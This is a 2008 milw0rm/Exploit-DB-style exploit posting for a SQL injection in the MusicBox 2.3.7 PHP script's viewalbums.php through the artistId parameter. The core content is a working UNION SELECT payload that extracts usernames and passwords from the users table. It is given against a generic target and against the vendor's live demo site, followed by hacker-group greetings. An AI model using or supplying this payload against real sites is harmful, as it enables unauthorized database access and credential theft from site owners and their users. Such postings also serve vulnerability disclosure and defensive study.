MusicBox 2.3.7 - 'artistId' SQL Injection

EDB-ID:

5560




Platform:

PHP

Date:

2008-05-07


#########################################
#    Rem0te SQL Injection Vulnerability                           #
#       Musicbox [viewalbums.php]                                 #
########################################

[<>]Author: HaCkeR-EgY
 
[<>]H^0mE: www.pal-hacker.com ,  atsdp.com
 
[<>]CONTact: hacker_EGY@hotmail.com 
===========================================================
[<>]Script : Musicbox
 
[<>]version : Version 2.3.6 / 2.3.7
 
[<>]Script Price: Only $ 255.00
 
[<>]Download : www.musicboxv2.com
============================================================
 
[<>] D0RK : ... you know
 
[<>] ExPLO!t :
             
  ===>
http://www.target.com/version2.3.7/viewalbums.php?artistId=-1/**/union/**/select/**/1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10/**/from/**/users/*
 
 
[<>] live DemO :
            
  ===>
  http://www.musicboxv2.com/version2.3.7/viewalbums.php?artistId=-1/**/union/**/select/**/1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10/**/from/**/users/*
 
==============================================================
[<>] Thanx : MY Brotha and MY Master " Abo Mohamed "
 
[<>] Greetz : F!resell , Mohamed el Arab ,Mr.EXE , DaRk MaStEr ,H-T Team
                   Gold_M , V4 Team , Jiki Team  , RoMaNcYxHaCkEr
===============================================================

# milw0rm.com [2008-05-07]